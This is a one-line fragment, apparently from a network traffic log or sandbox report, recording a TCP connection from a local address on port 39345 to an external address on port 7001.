          Source: global trafficTCP traffic: 192.168.1.100:39345 -> 138.33.161.128:7001